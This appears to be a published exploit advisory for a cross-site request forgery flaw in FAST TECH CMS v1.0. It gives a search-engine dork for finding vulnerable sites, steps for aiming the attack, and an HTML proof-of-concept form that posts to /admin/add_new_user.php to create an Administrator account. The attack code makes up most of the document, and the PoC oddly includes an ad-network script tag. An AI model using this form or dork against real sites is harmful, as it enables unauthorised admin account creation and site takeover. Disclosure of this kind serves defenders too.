Authored by indoushka

FAST TECH CMS version 1.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================
| # Title : FAST TECH CMS v1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) |
| # Vendor : http://www.fasttechtechnologies.in/ |
| # Dork : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved. |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] The following HTML code creates a new admin.

[+] Go to the line 5.

[+] Set the target site link, save changes and apply.

[+] infected file : /admin/add_new_user.php

[+] save code as poc.html .

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<script data-ad-client="ca-pub-6966557515756083" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<form action="https://127.0.0.1/repairthikanacom/admin/add_new_user.php" method="post" name="newuserform" enctype="multipart/form-data">
<div class="form-group">
<label>Name</label>
<input type="text" class="form-control" id="name" name="name" placeholder="Enter Name ..." required>
</div>
<div class="form-group">
<label>User Name</label>
<input type="text" class="form-control" id="username" name="username" placeholder="Enter User Name ..." required>
</div>

<div class="form-group">
<label>Password</label>
<input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required>
</div>


<div class="form-group">
<label>Confirm Password</label>
<input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required>
</div>


<div class="form-group">
<label>User Type</label>
<select class="form-control" id="usertype" name="usertype" required>
<option>Select Type</option>
<option value="A">Administrator</option>
<option value="R">Retail</option>

</select>
</div>

<div class="form-group">
<label>Email-Id</label>
<input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required>
</div>

<div class="box-footer">
<button type="submit" class="btn btn-primary" name="submit">Submit</button>
</div>
</form>
</div>

</div>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================